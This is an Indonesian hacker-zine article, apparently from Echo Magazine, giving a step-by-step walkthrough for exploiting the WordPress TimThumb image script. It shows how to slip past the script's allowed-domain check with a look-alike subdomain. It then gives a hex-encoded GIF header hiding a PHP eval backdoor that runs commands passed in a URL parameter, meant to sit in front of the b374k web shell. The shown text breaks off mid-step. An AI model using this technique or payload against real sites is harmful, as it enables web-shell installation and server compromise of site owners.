.; .-. .-. .-. ;;-. .-..-. `-' . ,';. .-. .;.-' ; ;; ;; ;' ;. ;' ;; ;;.;.-' `:::'`;;;;'.;` ``;;'( ;_.;:._.'; ;; `:::' `-' ; `. ECHO MAGAZINE VOLUME IX, ISSUE XXIV, PHILE 0x08.TXT Hacker Log Book: WP-Timthumb Exploitation - jos_ali_joe a.k.a tempe_mendoan failed404/at/gmail/com/com -----[ Pendahuluan Sebelum nya Banyak sekali artikel tentang timthumb yang sedang ramai di bicarakan saat ini karena itu Dalam tulisan ini saya sekedar menulis tulisan tentang timthumb. Dalam theme wordpress saat ini kebanyakan atau menggunakan timthumb karena plugin ini kegunaan nya adalah untuk croping dan resize images. Exploit timthumb.php ini pertama kali di publish oleh Mark Maunder ( Vulnerability Disclosed ) di dalam website pribadi nya, dan kemudian di kembangkan kembali oleh ( Vulnerability Researched ) Nah lanjut yo dalam tulisan atau artikel kali ini saya ingin mengembangkan exploitasi timthumb.php secara berbeda yang di gunakan oleh Maxe Walaupun methode nya sama tapi di sini langsung menggunakan remote injection melalui website domain :D Dalam methode Maxe yang di gunakan adalah TimThumbCraft, untuk lebih jelas nya bisa mampir ke sini http://www.exploit-db.com/wordpress-timthumb-exploitation/ -----[ Proses Kerja Timthumb.php adalah sebuah script php untuk mengubah ukuran gambar di website , timthum.php sendiri kebanyakan atau hampir 90% di gunakan oleh theme Wordpress Dari semua permintaan fitur TimThumb yang paling populer adalah mampu untuk memotong gambar dari suatu tempat tertentu, dan mampu memuat gambar dari situs web eksternal. Secara default TimThumb dapat mengubah ukuran gambar host di flickr.com, picasa.com, blogger.com, wordpress.com, dan img.youtube.com. -----[ Remote Code Injection Timthumb.php 1. Add Domain maksud dari add domain di sini adalah add domain website kita , di sini saya memberikan contoh : domain website saya adalah fansecho.com nah di sini saya add domain saya menjadi blogger.com.fansecho.com nah kenapa saya membuat domain seperti itu ? Karena di sini timthumb adalah default plugin yang hanya bisa mengubah ukuran gambar dari domain berikut : ---------------------------------------------== $allowedSites = array ( 'flickr.com', 'picasa.com', 'blogger.com', 'wordpress.com', 'img.youtube.com', 'upload.wikimedia.org', ); ------------------------------------------------ Nah maksud dari $allowedSites adalah timthumb.phpp hanya bisa mengambil image dari luar (external image) dari situs di atas. ------------------------------------------------ if (strpos (strtolower ($src), 'http://') !== false || strpos (strtolower ($src), 'https://') !== false) if (strpos (strtolower ($url_info['host']), $site) !== false) ------------------------------------------------ Ingat untuk domain yang saya gunakan tadi blogger.com.fansecho.com hanya sebuah contoh bisa juga flickr.com.fansecho.com , atau domain yang ada di list 2. Create Shell Maksud dari Create shell adalah di sini kita menambahkan code image GIF yang telah kita Decode, ------------------------------------------------ \x47\x49\x46\x38\x39\x61\x01\x00\x01\x00\x80\x00\x00 \xFF\xFF\xFF\x00\x00\x00\x21\xF9\x04\x01\x00\x00\x00 \x00\x2C\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02 \x44\x01\x00\x3B\x00\x3C\x3F\x70\x68\x70\x20\x40\x65 \x76\x61\x6C\x28\x24\x5F\x47\x45\x54\x5B\x27\x63\x6D \x64\x27\x5D\x29\x3B\x20\x3F\x3E\x00 ------------------------------------------------ Kode Hex di atas kita Decode ke String, dan hasil nya : ------------------------------------------------ GIF89a?????���???!�????,???????D?;? ------------------------------------------------ Kode di atas kita masukan di atas script shell, di sini saya menggunakan shell b374k : ------------------------------------------------ GIF89a?????���???!�????,???????D?;?